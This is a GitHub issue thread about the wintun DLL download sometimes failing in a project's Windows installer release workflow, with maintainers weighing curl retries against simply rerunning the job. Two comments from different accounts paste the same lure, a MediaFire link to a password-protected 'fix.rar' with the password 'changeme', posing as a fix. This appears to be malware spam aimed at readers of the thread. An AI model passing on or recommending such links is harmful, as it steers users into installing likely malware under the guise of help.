### ISSUE TITLE
Downloading wintun dll for release sometimes fails

### ISSUE THREAD

**Issue by scottyeager** [threefoldtech/mycelium#410]
I was testing the release process for the Windows installer on a fork, since I noticed that the msi file is missing from the v0.5.4 release on this repo.

Something I noticed is that the download of the wintun zip file fails sometimes:

![image](https://github.com/user-attachments/assets/28c955ba-d59d-4e5c-8963-dd7cd9671b41)

This happened twice during my testing. I wonder if the server for the wintun project isn't so reliable, or if there's something else going on.

Either way, maybe it's worth just checking the dll file into this repo so we can be sure the release process is reliable.

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by scottyeager** [comment]
I saw this a couple more times in my testing today. Thoughts @LeeSmet or @maximevanhees?

**Comment by maximevanhees** [comment]
> I saw this a couple more times in my testing today. Thoughts @LeeSmet or @maximevanhees?

I had the same experience today whilst testing on my fork. It seems to be unreliable but I have no idea why.

**Comment by scottyeager** [comment]
Another approach we could consider is adding some retry and timeout parameters to the curl invocation. Such as:

```
--connect-timeout 60
--retry 5
```

For five tries with a one minute timeout each.

**Comment by LeeSmet** [comment]
While this is an annoying issue, I don't really think we should spend time trying to work around this on our end at the moment. A failed worfklow can be rerun later by manual intervention, which should be sufficient here since it's a very infrequent worklflow, and since it's an  external site/service we don't know what is _actually_ happening over there.

**Comment by scottyeager** [comment]
That's fine by me.
